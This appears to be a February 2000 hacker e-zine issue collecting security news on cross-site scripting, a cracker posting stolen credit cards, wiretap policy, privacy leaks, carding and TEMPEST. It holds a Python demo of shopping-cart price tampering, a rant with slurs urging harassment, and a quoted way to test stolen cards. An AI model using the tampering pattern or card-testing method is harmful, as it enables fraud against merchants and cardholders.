CERT publications and other security information are available from our web site

  http://www.cert.org/

To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message.

Copyright 2000 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in

  http://www.cert.org/legal_stuff.html

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

Revision History

February 2, 2000: Initial release.
February 3, 2000: Clarifications on impact of Java applets. New vendor information.

-=-

Associated Press
http://www.sjmercury.com/svtech/news/breaking/ap/docs/165817l.htm

Experts warn of Web surfing risk

BY TED BRIDIS
Associated Press Writer

WASHINGTON (AP) -- The nation's top computer experts warned Internet users Wednesday about a serious new security threat that allows hackers to launch malicious programs on a victim's computer or capture information a person volunteers on a Web site, such as credit card numbers.

The threat, dubbed ``cross-site scripting,'' involves dangerous computer code that can be hidden within innocuous-looking links to popular Internet sites. The links can be e-mailed to victims or published to online discussion groups and Web pages.
The vulnerability was especially unusual because it is not limited to software from any particular company. Any Web browser on any computer visiting a complex Web site is at risk.

No one apparently has been victimized yet. But the risks were described as potentially so serious and affected such a breadth of even the largest, most successful Web sites that the industry's leading security group said nothing consumers can do will completely protect them.

Only a massive effort by Web site designers can eliminate the threat, according to the CERT Coordination Center of Carnegie Mellon University and others. Software engineers at CERT issued the warning Wednesday together with the FBI and the Defense Department.

The problem, discovered weeks ago but publicly disclosed Wednesday, occurs when complex Internet sites fail to verify that hidden software code sent from a consumer's browser is safe.

Experts looking at how often such filtering occurred found that Internet sites failing to perform that important safety check were ``the rule rather than the exception,'' said Scott Culp, the top security program manager at Microsoft.

``Any information that I type into a form, what pages I visit on that site, anything that happens in that session can be sent to a third-party, and it can be done transparently,'' Culp warned. He added: ``You do have to click on a link or follow a link in order for this to happen.''

The dangerous code also can alter information displayed in a consumer's Web browser, such as account balances or stock prices at financial sites. And it can capture and quietly forward to others a Web site's ``cookie,'' a small snippet of data that could help hackers impersonate a consumer on some Internet pages.

``It really goes across a huge number of sites,'' said Marc Slemko, a Canadian software expert who studied the problem.
Slemko said Internet-wide repairs will be ``a very, very major undertaking.''

In the interim, experts strongly cautioned Internet users against clicking on Web links from untrusted sources, such as unsolicited e-mail or messages sent to discussion forums. They also recommended that consumers at least consider preventing their Web browser software from launching small programs, called scripts. But they acknowledged that many Internet sites require that function to operate.

``A large number of sites simply aren't usable'' without those functions, Slemko said.

Microsoft said it planned to publish full details and step-by-step instructions for consumers at its Web site, www.microsoft.com/security.

@HWA

93.0 HNN: Feb 3rd: Curador Posts More CC Numbers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Curador

After having his Xoom.com web site shut down after posting 1000 credit card numbers, Curador has moved on to Geocities. This time he is posting several thousand numbers from four different e-commerce sites, and he is including names and addresses. The new GeoCities site has been online and active for almost 24 hours; while their abuse department has been contacted, it is unknown how long the site will remain active. Curador has claimed to have posted the numbers from http://www.shoppingthailland.com, http://www.ltamedia.com and two sites hosted at http://www.promobility.net.

APB News
http://www.apbnews.com/newscenter/internetcrime/2000/02/01/hack0201_01.html

Was Bill Gates' Credit Card Number Online?
Teen Claims It Was One of Hundreds He Posted

Feb. 1, 2000

By David Noack

NEW YORK (APBnews.com) -- A self-proclaimed teenage "cracker" who claims to have gotten into the database of an e-commerce site has posted hundreds of credit card numbers online -- including one he says belongs to Microsoft Chairman Bill Gates.

The 18-year-old uses the name Curador, which means custodian.
In an e-mail message today, he said he had posted 1,000 credit card numbers and promised to post another thousand in the next two days.

Curador disowned the term "hacker" on the grounds that he trespasses on sites but does not destroy data. Instead, he prefers the word "cracker."

The credit card numbers were posted on a personal home page at Xoom.com, which is part of the family of NBCi, a subsidiary of the broadcasting network. Xoom removed the page at around 12:30 p.m. today.

Visitor to page blew whistle

Roger Maes, director of investor relations for NBCi, said the company received information early today that a Web site was posting credit card information. Maes could not say how long the site had been online or how many people might have viewed it. He said the company is reporting the incident to the "proper authorities."

"We have a dedicated group internally who all they do is monitor terms of service violations, and we also encourage our visitors as well as other home page members to report any terms-of-service violations," Maes said. "We were actually alerted by a visitor. I went there, actually saw it, and it was removed in a couple of minutes."

He declined to say who registered the Web site.

Adam Sohn, a Microsoft spokesman, called the story about alleged posting of Gates' credit card number "dubious and fraught with errors."

"It's unfortunate that folks are doing this kind of thing. It's irresponsible and criminal," said Sohn.

Claims to have 5,000 more

Curador claims to have at least 5,000 credit card numbers that he got while hacking into an online mall based in Thailand.

"I Intend to Post another 1,000 Cards in the Next 48 Hours the Rest, I will keep in my collection, what you have to remember is that although I only have 5,000 numbers, I can extrapolate a few valid card numbers from each of those 5,000 Cards," Curador said in an e-mail.

Curador denied any financial motive.
"My main motive was boredom, pure and simple so I did this little crack, E-Commerce sites beware because I am Posting from more sites soon," Curador warned.

Curador's message

Information about the alleged hacking incident was posted to one of the hacking-related mailing lists. Part of the message reads:

"The Site Is A List Of Stolen CC Numbers Over a Thousand, Read more there. I hope you like my work? If ya want Interviews E-mail me the Questions.)...byebye"

"I did not demand money from the e-commerce site, who are blissfully unaware that I have put these numbers on-line," Curador said. "In the Next 48, Hours, I Will Post a Link to their site, Plus (maybe) the Names & Address of the People who's Numbers I Post, But only if I can be bothered. You can check if these are real the same way I did go visit any porno site, and enter the card numbers you will be approved and that is the only proof I can offer."

'Not a great feat of magic'

One computer security expert, who did not want to be named, called this latest incident the equivalent of "Dumpster diving," referring to a practice by some teenagers who go into trash bins in the back of buildings to get carbon copies of credit cards.

"You don't have to have a Ph.D. in computer science to do this. You have to know how to turn a computer on and that's about it. This is not great feat of magic for these kids," he said.

From examining the header information on the e-mail message, the security expert believes the sender is in the Colorado Springs, Colo., area. Curador, however, insists he is in Europe.

The security expert said the so-called e-commerce hacking incidents do not take any great computer skills.

'Not breaking into anything'

"They are not breaking into anything," he said. "What they are doing is going to the Web site, using the CGI's [common gateway interface] and they're making the CGIs dump out credit card databases and they're using Microsoft's SQL Server [standard query language].
They are connecting to an SQL port and downloading databases."

The security expert said many e-commerce sites sacrifice security in favor of ease of access and purchase.

"An e-commerce site cannot be secure and convenient, and if it's not real convenient, people aren't going to use it. The problem is that companies that have e-commerce are trying to rake in all this money, but they seriously lack security, and they know it. They don't want to implement it because it may require a few more clicks or it is a little more complicated," he noted.

He suspects that the people responsible for this latest action also perpetrated the CD Universe intrusion, though a Russian hacker named "Maxus" claimed responsibility. The security expert said he believes "Maxus" is really a group of teens in Colorado Springs.

'General lack of security'

Space Rogue, editor of the Hacker News Network and a research scientist at the newly formed e-commerce security company @Stake, said the hacking claim might be true.

"I have no reason to doubt it took place. Considering the general lack of security on e-commerce sites as evidenced by all the recent blunders [such as] CD Universe, Outpost.com, Northwest Airlines. It doesn't really surprise me," said Space Rogue.

He said that posting the credit card numbers and not citing the vandalized e-commerce site is wrong.

"As for actually posting the numbers to the Net, that's something I don't agree with," Space Rogue said. "The fact that the company in question was not mentioned nor the details of the hole is completely irresponsible."

The credit card posting follows the highly publicized hacking into the database of music e-retailer CD Universe. "Maxus" claimed to have stolen information on 300,000 credit cards. Maxus began posting numbers online after the company refused to pay him $100,000.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).
@HWA

94.0 HNN: Feb 3rd: IETF Says No To Inet Wiretaps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The Internet Engineering Task Force has issued a resounding no to Internet wiretaps. They said that they would not "consider requirements for wiretapping" in protocols.

IETF Draft Proposal
http://www.ietf.org/internet-drafts/draft-ietf-iab-raven-00.txt

Wired
http://www.wired.com/news/politics/0,1283,34055,00.html

Thumbs Down on Net Wiretaps
by Declan McCullagh
3:00 a.m. 3.Feb.2000 PST

WASHINGTON -- It took four months, a grim debate, and thousands of mailing list messages, but the group that sets Internet standards has decided not to support wiretapping.

The executive committees of the Internet Engineering Task Force dismissed the idea with characteristic understatement, saying they would not "consider requirements for wiretapping" in protocols.

The 15 KB draft document released this week caps an unusually public debate inside IETF that was marked by an FBI call to permit wiretaps, Congressional condemnation of the idea, and a flame-ridden mailing list called "raven" that lived up to its homophonous name.

But in the end, most members of the loose-knit group that met here in November opposed the idea, and the draft written by the Internet Architecture Board and the Internet Engineering Steering Group is the result.

There's some precedent for the IETF refusing to bow to direct or indirect government pressure to build surveillance into the Internet. In a now-famous draft called RFC 1984, the group denounced easily breakable encryption and endorsed secure communications.

Under the organization's procedures, this week's draft statement is not yet final and members can offer changes. But a member of the drafting group said he anticipates no serious alterations.

"The only thing I expect is wording changes," says Jeff Schiller, an MIT network manager and IESG member.
"I think the community has pretty much told us what they want to see here. I would not expect the community to do a 180-degree about-face."

Yet even wording can be divisive. It didn't take long for raven list members to complain that the IETF's definition of "wiretap" would allow future protocols to support broad surveillance -- as long as the interception wasn't targeted at specific people.

"This is outrageous," wrote Ed Stone. "A third party taps a communication in secret, but the selection is NOT targeted to a SPECIFIC person, so it is not 'wiretapping.' This is simply incredible!"

IETF chairman Fred Baker did his best to mollify the critics, and -- for once -- there seemed to be only a few.

"Maybe you can offer some better text," Baker replied. "What we were trying to say was that when one puts a sniffer on an Ethernet for network management purposes for a purpose unrelated to capturing a user's content [such as trying to collect usage statistics] this was not wiretapping."

Administrators regularly monitor Internet traffic flow to determine things like what percentage of traffic is devoted to the Web compared to email, and tools like MCI's vBNS make it easy. (One 1998 paper calculated that roughly 70 percent of traffic at one node was Web usage.)

If there's no serious opposition, the draft will become an Internet standard.

@HWA

95.0 HNN: Feb 3rd: Medical Web Sites Leak Privacy Info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Despite promises to the contrary, medical and health related web sites are giving out the personal information of their visitors to marketers without notifying them, sometimes in direct violation of their own privacy policy. The privacy breaches were discovered after a survey of 21 of the web sites was conducted by the California HealthCare Foundation.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2431429,00.html?chkpt=zdnntop

NY Times
http://www.nytimes.com/library/tech/00/02/cyber/articles/02privacy.html

C|Net
http://news.cnet.com/news/0-1007-200-1539309.html?tag=st.ne.1002.bgif.1007-200-1539309

NYTimes; February 2, 2000

Health Sites Violate Their Own Privacy Standards, Study Finds

By JERI CLAUSING

WASHINGTON -- Internet health sites collect some of the most personal information about their users, but few follow their own declared policies about maintaining the privacy of that data, according to a survey made public Tuesday.

The study, by the California HealthCare Foundation, found that 19 of the top 21 health sites had privacy policies, but that most failed to follow their stated practices. And none of the sites followed fair information practices as defined by the Federal Trade Commission.

The survey comes as policy makers are more closely scrutinizing the privacy practices of Web sites to determine whether new laws are needed to regulate online marketers.

Privacy advocates said the study proved that the Internet industry has failed in its attempts to police itself in the area of online privacy.

"This is about the 7,000th piece of conclusive evidence that self-regulation is not working," said Jason Catlett, founder of Junkbusters Corp., a company that helps people and companies protect their privacy online.

The study's authors, however, were less judgmental, comparing the online health industry to an awkward adolescent who has yet to understand all the implications of his actions.

Richard M. Smith, an Internet security analyst, and Janlori Goldman, director of the project, said Internet health sites are well aware that consumers expect the information they supply to be confidential. They said they believe many of the sites are unaware that third-party advertisers and service providers have access to the personal information they are collecting.
The technological mechanisms behind the privacy violations, Smith said, include the use of "cookies," which track Web surfers' movements online, and banner ads, which in some cases can pick up the information entered by visitors on the pages where they are displayed. The combination can enable advertising companies like DoubleClick to build detailed profiles of consumers and of the information they seek online.

For example, Smith said, some companies that place banner ads would be able to pick up an e-mail address entered by someone visiting a Web page about AIDS, even if the visitor never clicked on that ad. The address could then be matched with the Web "footprints" left on that computer by implanted cookies.

Many consumers and even Web site operators are unaware that advertisers have such technical capabilities, which allow them to build huge databases of consumer behavior, Smith said.

"It's complicated," Smith said. Some of the privacy violations "are accidental, and some are on purpose. Some (sites) really don't know that DoubleClick is collecting addresses," he said.

Catlett, a technical expert who previously worked for the data mining division of AT&T, said he thinks it is very plausible that many Web sites are unknowingly violating their own privacy policies.

"A lot of these sites are being set up in great haste, and often without sufficient knowledge or attention to the leakage that takes place with online advertising," he said.

Still, Catlett said, "It's horrifying but not surprising that medical sites are doing as poor a job on privacy as used car trading sites."

"I think probably medical sites are not doing any worse of a job on privacy as other e-commerce sites, but the public's expectations and need for privacy in a medical site is so much greater that the truly horrendous prevailing levels of privacy on the Web are just ludicrous," he said.
Although privacy advocates for years have been calling on Congress to pass a law setting rules for Internet sites to follow when collecting personal information, the Clinton administration and the Federal Trade Commission have sided with the Internet industry, which says it needs a chance to prove that marketers and online merchants can police themselves.

FTC officials on Tuesday had no comment on the study. This spring the commission is expected to issue its third annual report to Congress on the state of online privacy and whether it thinks new laws are needed.

The study's authors declined to get into the political debate over whether new laws are needed, saying they conducted the survey in hopes of providing the industry with the information it needs to better meet customers' online privacy expectations.

"The goal of the California HealthCare Foundation is to be a broker in this rapidly changing arena," said Mark D. Smith, president of the group, which presented its study during a summit on online health ethics.

@HWA

96.0 HNN: Feb 4th: 27 Months for Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by mortel

A British citizen has been sentenced in U.S. District Court in San Jose to 27 months in prison for selling pirated copies of popular computer programs, such as Microsoft Excel, Lotus 123 and Auto Desk AutoCAD. He was originally indicted by a federal grand jury in April 1996. (It took almost four years to come to trial? No wonder the guy pleaded guilty.)

Yahoo News
http://dailynews.yahoo.com/h/kpix/20000203/lo/20000203112.html

Thursday February 03 11:41 PM EST

San Jose Sentencing For Sale of Pirated Programs

A British citizen has been sentenced in U.S. District Court in San Jose to 27 months in prison for selling pirated copies of popular computer programs. Lawrence Warmate, 40, was sentenced by Judge Ronald M. Whyte on Jan. 31.
Warmate pleaded guilty to reproducing and selling computer software such as Microsoft Excel, Lotus 123 and Auto Desk AutoCAD. The pirated software was valued at between $350,000 and $500,000 by the court. Warmate was originally indicted by a federal grand jury in April 1996.

J.Bennert827p2/3/00

-=-

(...40 yrs old? Don't assume that all 'warez kiddiez' and 'script/packet kiddiez' really are kids... this is an excellent case in point. You don't really know who's out there; one major warez group has an average age of 34 among its members, one as young as 12, another as old as 50 ... - Ed)

@HWA

97.0 Have you been looking for www.hack.co.za?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By: Cruciphux

You can find it here, temporarily. It's posted all over the zine, but just so you all can find it, I stuck the info in its own section.

http://www.siliconinc.net/hack/index.html

It does NOT appear to be getting updated, and seems to be a portion of the site only. Unknown if the '0-day' special private contributions / download section is active or not on this mirror. I haven't been able to get in touch with gov-boi; I don't have his email and I've been missing him on IRC, but when I get a hold of him I'll get an update on the site, the investigation into the DoS attacks, and forward mail I've received for him. Thanks to all for the support.

@HWA

98.0 HNN: Feb 4th: Security Holes Allow Prices to be Changed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by turtlex

Shopping cart software is vulnerable to users changing the price of goods. By altering a page locally or twiddling with a URL, customers are sometimes able to purchase goods online for whatever price they choose.
The UK Register
http://www.theregister.co.uk/000203-000006.html

Posted 03/02/2000 11:59am by John Lettice

Online store security holes let hackers buy at cut price

A security hole in some web-based shopping cart systems allows shoppers to edit the data and buy items at reduced prices, according to an ISS (Internet Security Systems) X-Force security alert issued this week. According to X-Force, 11 shopping cart applications used by e-commerce sites are vulnerable to this kind of malicious tampering.

Some shopping cart applications use hidden fields in HTML forms to hold parameters for goods in an online store, and this is one potential security hole. If the attacker changes the price in the form on a local machine then loads the page into the browser, the item can be added to the cart at the modified price. If hidden discount fields are used it's also possible to modify these and get discounts on items without modifying the price in the form.

From the vendor's point of view this gets really nasty if credit card orders are processed in real time, and it's difficult to verify that the correct price is being used before the credit card is charged.

X-Force also says that price changing is possible where an item's price is listed in a URL. "When clicking a link, the CGI program will add the item to the shopping cart with the price set in the URL. Simply changing the price in the URL will add the item to the shopping cart at the modified price. Shopping cart software should not rely on the web browser to set the price of an item."

Most of the sites affected have begun modifying their software to plug the holes, says X-Force.
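The hidden-field and URL price tampering described above, as an added example that is not part of the Register article or the X-Force alert: a constructed Python add-to-cart handler in the vulnerable form (price and discount taken from the client) beside a hardened one that looks the price up server-side and logs any client-supplied price as a tamper signal. The catalog, item ids, discount code and request strings are made up for illustration.

```python
"""Add-to-cart handling for a web shop: the price-tampering pattern from the
ISS X-Force alert beside a hardened handler. Everything here is constructed
for illustration (catalog, item ids, discount code, request strings)."""
from dataclasses import dataclass, field
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs

# Constructed catalog: the server's authoritative unit prices, keyed by item id.
CATALOG = {
    "sku-100": Decimal("49.99"),
    "sku-200": Decimal("199.00"),
}

# Constructed discount table: the server decides which discount rates exist.
DISCOUNT_CODES = {"SPRING10": Decimal("0.10")}


@dataclass
class Cart:
    lines: list = field(default_factory=list)   # (item_id, quantity, unit_price)
    alerts: list = field(default_factory=list)  # tamper observations to log

    def total(self) -> Decimal:
        return sum((qty * price for _, qty, price in self.lines), Decimal("0"))


def parse_request(query_string: str) -> dict:
    """Flatten a query string or posted form body into a {name: value} dict."""
    return {k: v[0] for k, v in parse_qs(query_string, keep_blank_values=True).items()}


def add_to_cart_vulnerable(cart: Cart, params: dict) -> Cart:
    """The pattern the alert describes: the price and discount arrive in a
    hidden form field or in the link URL, so the browser sets the price."""
    item = params["item"]
    qty = int(params.get("qty", "1"))
    price = Decimal(params["price"])                 # trusted from the client
    discount = Decimal(params.get("discount", "0"))  # also trusted from the client
    cart.lines.append((item, qty, price * (1 - discount)))
    return cart


def add_to_cart_hardened(cart: Cart, params: dict) -> Cart:
    """Hardened handler: the unit price comes from the server-side catalog, a
    discount only from a server-known code, and client-supplied price or
    discount fields are recorded as tamper signals rather than honoured."""
    item = params.get("item", "")
    if item not in CATALOG:
        raise ValueError(f"unknown item id: {item!r}")
    qty = int(params.get("qty", "1"))
    if not 1 <= qty <= 100:
        raise ValueError(f"quantity out of range: {qty}")

    unit_price = CATALOG[item]
    code = params.get("discount_code", "")
    if code in DISCOUNT_CODES:
        unit_price = (unit_price * (1 - DISCOUNT_CODES[code])).quantize(Decimal("0.01"))

    # Detection: a price field that disagrees with the catalog, or any
    # client-side discount field at all, is worth logging before the charge.
    claimed = params.get("price")
    if claimed is not None:
        try:
            mismatch = Decimal(claimed) != CATALOG[item]
        except InvalidOperation:
            mismatch = True
        if mismatch:
            cart.alerts.append(
                f"price tamper on {item}: client sent {claimed!r}, catalog {CATALOG[item]}")
    if "discount" in params:
        cart.alerts.append(f"client-supplied discount field ignored for {item}")

    cart.lines.append((item, qty, unit_price))
    return cart


if __name__ == "__main__":
    # Constructed request: a $199 item with the hidden price field edited to 1 cent.
    tampered = parse_request("item=sku-200&qty=1&price=0.01")
    print("vulnerable total:", add_to_cart_vulnerable(Cart(), tampered).total())
    hardened = add_to_cart_hardened(Cart(), tampered)
    print("hardened total:", hardened.total(), "alerts:", hardened.alerts)
```

The same lookup-by-id rule applies to the URL variant the alert quotes: the link should carry only the item id, and the CGI program fills in the price from its own catalog.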
@HWA

99.0 ThE,h4x0r.Br0z toss us a dis
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This is kinda old and dated now, thing is see, I forgot about it, anyways here's the infamous hax0r brothers with some shiznitz and dizzing on our groove thang... taken from issue #11

http://the.wiretapped.net/security/textfiles/ThE.h4x0r.Br0z/haxo11.txt

<snip>

┌────────────[ BiaTcH NeWz SiTeZ ShiZUm ]───────────────────────────>
└──> Hax0rWang

oK FuCkiN SHIT iTz AbouT tiME thAT I cOmE ouT anD spEAk ON THIZ!@# TheRE aRE waY t0 mAnY fuCkIN NEws WeBSiteZ anD sHIzniTcH aND ZiNE THiNGS baSeD oN HaCkuZ aND hAcKiNG thAT hAvEn'T doNE shiT aS fAr aS RePorTiNG abOUT uS.. s0 iTz TiME we LaY thE sMACk d0wN!@# FirST thiNGyZ FIrzsST.. HaCkeRneWS.Com... OkAy HeLLo? H0w CaN iT bE haXOr nEWz iF iT doEsNT taLK abOUT uS j00 fuCkiN BITcHnuTz!@ AnD thAT GaY asS hWa.hAxoR.nEwZ... SurE tHAts RiGHt.. TypE j0r FuCKinG NamE haxOR br0Z sTyLE anD donT giVe uS CreDit? JeW wILL pAy U fuCKinG FuCKz!@# ThiS iS thE haXoR br0thErZ CaLLinG aLL WaNNa BE HaXor bR0theRZ!# If j00 HaxoR eiTHeR haCkeRnEwS.CoM oR welcome.to/HWA.hax0r.news ThEN wE wILL GiVE j00 A fREe AuToGraPHeD pIcTurE oF uS.. wE oF COurSe WouLD haXOr iT ouRsElVeZ buT wE aRE pRepaRiNG foR ouR wOrlD TouR in 99!@#!@ hELL jEaH ouR moMZ aRe GOnNa LeT uS StaY uP tiLL liKE 9 anD shiT FoR thiS TOuR!@#!@# FuXoRiNG a!@# n0w iF j0r TeW LaYMEzoR tEw HaXOr TheIR PaGeZ THen j00 CaN do THiZ! SenD thEM aN eMaIL TelLinG thEM hoW lAyME thEY aRe anD ThaT THeY WilL alWaYz bE GaY bEcaUSe HAxor bROtheRZ owN thEM aND thEY Can'T bE haXor SItEz WiTH ouT ouR seAL oF fuCKin AppRoVaL whICh THeY deW nOT haVE!@# cC uZ a CopY iF j00 do THaT!@# AnD oN a FinaL n0tE... DeEz niGgaZ THiNK TheY caN TrY t00 RiP oUR LeeTneZZ.. ThEY EvEN CLaIM to BE thE lEEtESt.. s0 iF aNY oF j00 WaNNa sEE whAT HaxOR br0Z WaNNaBEeZ LooK liKE thEN CHeX0R ouT nEAtoELiTo.oRg.. BitChAz WaNNa bE fLY liKE uZ buT wE aRE juST t00 sCHaWeET!@# YeaH theEY aREn'T a nEwZ sITe BuT thEY sTiLL b0w t0 uZ anD TheY beTTa ReCoGNiZE!@#

<snip>

( We don't touch you coz we ph33r! - Ed )

@HWA

100.0 HNN: Feb 4th: Carders Congregate in IRC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by sean

The illegal exchange of credit card numbers is big business and it happens in IRC chat rooms, where law enforcement seldom goes. The consumer is only limited to a $50 liability and the huge CC company passes fraudulent charges back to the small time vendors so who has the motivation to stop it?

MSNBC
http://www.msnbc.com/news/365426.asp?cp1=1

101.0 HNN: Feb 4th; Tempest Tutorial and Bug Scanning 101
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by James

An excellent tutorial on the eavesdropping technology known as tempest has been posted. It covers the history as well as the theory behind this potentially frightening technology.

Tempest Tutorial
http://www.tscm.com/TSCM101tempest.html

On the Same Site we also found an excellent article covering commonly used listening device frequencies. It covers everything from 15.7kHz to the 2.4 GHz band. (Only for the truly paranoid.)

Bug Scanning 101
http://www.tscm.com/TSCM101bugfreq.html

(Mainly a freq list, no big whoop, go check it out if you're interested, I've printed the Tempest article below - Ed)

(This site isn't new to me, there is a LOT of information on intrusion countermeasures and bug detection on the net, tscm provides some of the best. - Ed )

Tempest: Introduction

When a new consumer electronic device such as a computer, DVD player, blender, electric razor or other modern electronic marvel is offered for sale to the public the manufacturer has to gain a special certification or authorization from the FCC.
This process ensures that when the consumer uses the device it will not interfere with other devices in the area. For example we don't want a DVD player or blender to accidentally jam all the TVs and cellular telephones in a five-block area due to a poor product design. The FCC (Federal Communications Commission) and its foreign equivalents have created a series of formal standards which new equipment is evaluated against before it is offered to the public. These new products are taken into a specialized laboratory, and an engineer completes a complicated battery of tests. These test results are then sent to the FCC who then approves or denies the authorization.

When modern electrical devices operate they generate electromagnetic fields. Digital computers, radio equipment, typewriters, and so on generate massive amounts of electromagnetic signals which if properly intercepted and processed will allow certain amounts of information to be reconstructed based on these "compromising emanations". Basically anything with a microchip, diode, or transistor, gives off these fields.

Compromising emanations are these unintentional intelligence-bearing signals, which, if intercepted and analyzed, potentially disclose the national security information, transmitted, received, handled, or otherwise processed by any information-processing equipment. These compromising emanation signals can then escape out of a controlled area by power line conduction, other fortuitous conduction paths such as the air conditioning duct work, or by simply radiating a signal into the air (like a radio station).

An excellent example of these compromising emanations may be found in modems and fax machines which utilize the Rockwell DataPump modem chip sets and several modems made by U.S. Robotics. When these modems operate they generate a very strong electromagnetic field which may be intercepted, demodulated, and monitored with most VHF radios.

This is also a very serious problem with many speaker phone systems used in executive conference rooms. This is also a very serious problem with many fax machines, computer monitors, external disc drives, CD-R drives, scanners, printers, and other high bandwidth or high speed peripherals. If an eavesdropper is using high quality intercept equipment the signal may be easily acquired several hundred feet or more away from the target.

In the consumer markets a slight amount of signal leakage really does not present a problem; however, if a computer processing classified information has a leak the results could be devastating. To deal with this "signal leakage" issue the government developed a series of standards which lay out how equipment should be designed to avoid such leakage. The TEMPEST standards are really nothing more than several industry measurement standards which were adjusted by the NSA (they gave it steroids). Really the only difference between a TEMPEST approved computer, and a consumer computer is that the NSA TEMPEST approved one will be in a special heavy metal case, will have special shielding, a modified power supply and a few other modifications which increase the price by at least 40 times.

About TEMPEST

TEMPEST is an official acronym for "Telecommunications Electronics Material Protected From Emanating Spurious Transmissions" and includes technical security countermeasures; standards, and instrumentation, which prevent (or minimize) the exploitation of security vulnerabilities by technical means. TEMPEST is nothing more than a fancy name for protecting against technical surveillance or eavesdropping of UNMODIFIED equipment (the unmodified part is important).

Other popular, but unofficial names for TEMPEST are "Transient Emanations Protected From Emanating Spurious Transmissions", "Transient Electromagnetic Pulse Emanation Standard", "Telecommunications Emission Security Standards", and several similar variations (including: "Tiny ElectroMagnetic Pests Emanating Secret Things").

TEMPEST was "invented" in 1918 when Herbert Yardley and his staff of the Black Chamber were engaged by the U.S. Army to develop methods to detect, intercept, and exploit covert radio transmitters. The initial research identified that "normal unmodified equipment" was allowing classified information to be passed to the enemy through a variety of technical weaknesses. A classified program was then created to develop methods to suppress these "compromising emanations". However, the actual acronym known as TEMPEST was only coined in the late 60's and early 70's (and is now considered an obsolete term, which has since been replaced by the phrase "Emissions Security" or EMSEC).

TEMPEST products exist; however, they are highly restricted and controlled SIGINT/COMINT (Signals or Communications Intelligence) products and are CIA/NSA grade surveillance goodies. Such products are only available from a very small number of defense or intelligence contractors, and only to those with really serious security clearances. TEMPEST products are not sold at Radio Shack, by private investigators, at spy shops in New York City, or by security "experts".

TEMPEST and its associated disciplines involve designing circuits to minimize the amount of "compromising emanations" and to apply appropriate shielding, grounding, and bonding. These disciplines also include methods of radiation screening, alarms, isolation circuits/devices, and similar areas of equipment engineering. TEMPEST disciplines typically involve eliminating or reducing the transients caused by a communication signal and the resulting harmonics.
These signals and their harmonics could allow the original signal to be reconstructed and analyzed.

TEMPEST Approved Devices

A TEMPEST approved device (see below) is one that meets stringent technical requirements. The electromagnetic waves it emits have been reduced through shielding or other techniques to a point where it would be extremely difficult for a hostile intelligence agent to gather information from the electromagnetic waves and disclose the classified information being transmitted.

TEMPEST Approval - Type 1: A classified or controlled cryptographic equipment, assembly, component, or item endorsed by the National Security Agency (NSA) for securing telecommunications and automated information systems for the protection of classified or sensitive U.S. Government information exempted by the Warner Amendment for use by the U.S. Government and its contractors, and subject to restrictions in accordance with the International Traffic in Arms Regulation.

TEMPEST Approval - Type 2: An unclassified cryptographic equipment, assembly, component, or item endorsed by the National Security Agency for use in telecommunications and automated information systems for the protection of unclassified but sensitive information. Type 2 equipment is exempted by the Warner Amendment. Type 2 is available to U.S. Government departments, agencies, sponsored elements of state and local government, sponsored U.S. Government contractors, and sponsored private sector entities. It is subject to restrictions in accordance with the International Traffic in Arms Regulation.

TEMPEST Approval - Type 3: An unclassified cryptographic equipment, assembly, component, or item that implements an unclassified algorithm registered with the National Institute of Standards and Technology (NIST) as a FIPS for use in protecting unclassified sensitive, or commercial, information. This definition does not include Warner-Amendment-exempt equipment.

Test Equipment for a TEMPEST in a TEAPOT

While SIGINT deals with the interception and analysis of "compromising emanations", TEMPEST is the protection of those "emanations". TEMPEST, TEAPOT (as in "TEMPEST in a TEAPOT"), NONSTOP, SKIPJACK, HIJACK, and TSCM are all related standards and protocols which deal with containing "compromising emanations".

TEMPEST generally deals specifically with shielding, bonding, and grounding (it is a counter-surveillance science, and has nothing to do with actual surveillance or reading or reconstructing these emanations).

TEAPOT refers to the investigation, study, and control of intentional compromising emanations such as those hostilely induced or provoked from telecommunications and computer equipment.

TSCM includes all countermeasures employed to prevent or detect the interception of sensitive, classified, or private information. TSCM is typically an inspection by a technician or engineer of a physical item or place (briefcase, automobile, office, home, boat, etc...). The purpose is to locate possible covert surveillance devices (bugs), technical security weakness, and technical security hazards.

TEMPEST test equipment is very expensive, and is a very highly controlled military product (usually classified). While a number of U.S. companies offer such equipment they will only sell it to government agencies. Beware of anybody who tries to foist a security product onto you and claims it involves TEMPEST technology. Such equipment utilizes both extremely narrow bandwidths (often 100 Hz or less), and very wide bandwidths (above 50 MHz). This kind of equipment also must use super stable time bases, which are very expensive. Even the most basic models of this kind of equipment cost hundreds of thousands of dollars. Of course such equipment is quite inappropriate for eavesdropping (there is no such thing as a "TEMPEST Eavesdropping System").
Van Ecking

